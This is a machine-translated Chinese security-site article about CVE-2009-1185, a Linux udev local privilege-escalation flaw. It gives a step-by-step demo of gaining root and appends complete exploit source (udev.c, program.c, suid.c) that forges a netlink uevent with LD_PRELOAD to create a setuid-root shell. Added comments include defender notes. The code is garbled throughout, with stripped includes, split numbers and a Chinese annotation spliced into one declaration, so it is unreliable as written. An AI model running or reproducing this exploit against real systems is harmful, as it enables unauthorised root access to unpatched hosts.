myhack58佚名MYHACK58:62200923218
HistoryMay 13, 2009 - 12:00 a.m.

Linux udev local privilege-escalation vulnerability - vulnerability warning - the black bar safety net

2009-05-1300:00:00
佚名
www.myhack58.com
56

7.2 High

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:C/I:C/A:C

0.0005 Low

EPSS

Percentile

13.2%

Vulnerability description: because udev does not verify that a NETLINK message originates from kernel space, a local user can send a crafted NETLINK message from user space and thereby obtain root privileges.
Specific information, please see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185
Below we get into the combat demo:
!
This vulnerability was posted on milw0rm on April 20, 2009; the exploit's author is Kcope, and we use his exploit directly.
First, we compile the exploit; as the figure below shows, three files need to be compiled.
! secondly, to take advantage of this vulnerability, we must know the NETLINK Socket’s PID, there are two ways, first with“cat /proc/net/netlink“command to view, the second may use“ps-aux | grep "udevd"to get the udevd PID, but usually we need to the NETLINK Socket’s PID is the udevd PID minus 1. As shown below, here we have the NETLINK Socket’s PID is 2 2 1 0, and the udevd PID is 2 2 1 to 1.
! the best, let us use our compiled EXP to elevated it, put you get the NETLINK Socket’s PID as the first parameter, as shown in Figure, let us look at the effect:

You can see that we’ve successfully gained root access. over!
Appendix: the exploit source code follows.
udev. c#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#ifndef NETLINK_KOBJECT_UEVENT
#define NETLINK_KOBJECT_UEVENT 1 5
#endif

#define SHORT_STRING 6 4
#define MEDIUM_STRING 1 2 8
#define BIG_STRING 2 5 6
#define LONG_STRING 1 0 2 4
#define EXTRALONG_STRING 4 0 9 6
#define TRUE 1
#define FALSE 0

/* Process-wide state shared with main(): the netlink socket, its
 * destination address, and the msghdr/iovec pair that carries the
 * fake uevent. */
int socket_fd;
struct sockaddr_nl address;
struct msghdr msg;
/* NOTE(review): the next line is corrupted in this page copy — a
 * Chinese annotation was pasted into the middle of the declaration. */
struct iovec结构包含待发送数据的緩冲区地址和长度 。 iovec iovector;
/* sz is defined but never referenced anywhere in the code shown. */
int sz = 6 4*1 0 2 4;

/*
 * Entry point of the udev.c part of the exploit described above.
 *
 * Builds a fake "add" uevent for a block device and sends it over a
 * NETLINK_KOBJECT_UEVENT socket to the netlink PID given in argv[1].
 * The key=value block ends with an LD_PRELOAD entry pointing at the
 * library built from program.c, so the exploit relies on udev accepting
 * a user-space message as if it came from the kernel (the root cause
 * stated in the vulnerability description above) and on that library
 * making /tmp/suid setuid-root. After a fixed delay the program runs
 * /tmp/suid.
 *
 * Defender notes: the weakness is the missing origin check on uevents
 * (CVE-2009-1185); the fix in later udev releases is to check the
 * sender's credentials and ignore uevents that do not come from the
 * kernel. Observable indicators of this technique include LD_PRELOAD
 * appearing in a udev event environment and newly setuid-root files
 * appearing under /tmp.
 *
 * The return type is implicit int (pre-C99 style) and argc is never
 * checked, so argv[1] may be NULL when no argument is given.
 */
main(int argc, char **argv) {
char sysfspath[SHORT_STRING];
char subsystem[SHORT_STRING];
char event[SHORT_STRING];
char major[SHORT_STRING];
char minor[SHORT_STRING];

/* Fields of the fake uevent: an "add" of block device 8:1 at /dev/foo. */
sprintf(event, “add”);
sprintf(subsystem, “block”);
sprintf(sysfspath, “/dev/foo”);
sprintf(major, “8”);
sprintf(minor, “1”);

/* Destination: the netlink socket whose PID was passed on the command
 * line (see the article above). nl_groups = 0 means a unicast send. */
memset(&address, 0, sizeof(address));
address. nl_family = AF_NETLINK;
address. nl_pid = atoi(argv[1]);
address. nl_groups = 0;

/* Single-iovec message addressed to `address`. */
msg. msg_name = (void*)&address;
msg. msg_namelen = sizeof(address);
msg. msg_iov = &iovector;
msg. msg_iovlen = 1;

/* Return values of socket() and bind() are not checked. */
socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
bind(socket_fd, (struct sockaddr *) &address, sizeof(address));

char message[LONG_STRING];
char *mp;

/* Payload layout: an "action@devpath" header followed by NUL-separated
 * KEY=value records (the +1 after each sprintf keeps the terminator).
 * The final LD_PRELOAD record is what the exploit depends on; the rest
 * describe the fake device. No bounds check against LONG_STRING. */
mp = message;
mp += sprintf(mp, “%s@%s”, event, sysfspath) +1;
mp += sprintf(mp, “ACTION=%s”, event) +1;
mp += sprintf(mp, “DEVPATH=%s”, sysfspath) +1;
mp += sprintf(mp, “MAJOR=%s”, major) +1;
mp += sprintf(mp, “MINOR=%s”, minor) +1;
mp += sprintf(mp, “SUBSYSTEM=%s”, subsystem) +1;
mp += sprintf(mp, “LD_PRELOAD=/tmp/libno_ex. so. 1. 0”) +1;

/* Point the iovec at the assembled records. */
iovector. iov_base = (void*)message;
iovector. iov_len = (int)(mp-message);

/* buf and buflen are assigned but never used. */
char *buf;
int buflen;
buf = (char *) & msg;
buflen = (int)(mp-message);

/* Result of sendmsg() is ignored. */
sendmsg(socket_fd, &msg, 0);

close(socket_fd);

/* Wait for the preloaded library (program.c) to have made /tmp/suid
 * setuid-root, then run it. */
sleep(1 0);
execl(“/tmp/suid”, “suid”, (void*)0);
}
program. c#include
#include
#include
#include

/*
 * Initialization routine of the shared object loaded through LD_PRELOAD
 * (program.c). When the library is preloaded into a privileged udev
 * helper it runs with that helper's privileges: it switches to uid/gid
 * 0, removes LD_PRELOAD from the environment (presumably so the child
 * shell is not preloaded again), and makes /tmp/suid root-owned and
 * setuid/setgid via `/bin/sh -c`.
 *
 * Return values of setgid()/setuid() and execl() are not checked.
 * `_init` is an identifier reserved for the implementation.
 */
void _init()
{
setgid(0);
setuid(0);
unsetenv(“LD_PRELOAD”);
execl(“/bin/sh”,“sh”,“-c”,“chown root:root /tmp/suid; chmod +s /tmp/suid”,NULL);
}
/*
 * suid.c: the helper that program.c turns setuid-root. It raises its
 * gid/uid to 0 and replaces itself with /bin/sh. Return values are not
 * checked, and the execl() argument list is terminated with a plain 0
 * rather than NULL (the filename label "suid. c" is fused onto the
 * first line in this page copy).
 */
suid. cint main(void) {
setgid(0); setuid(0);
execl(“/bin/sh”,“sh”,0); }
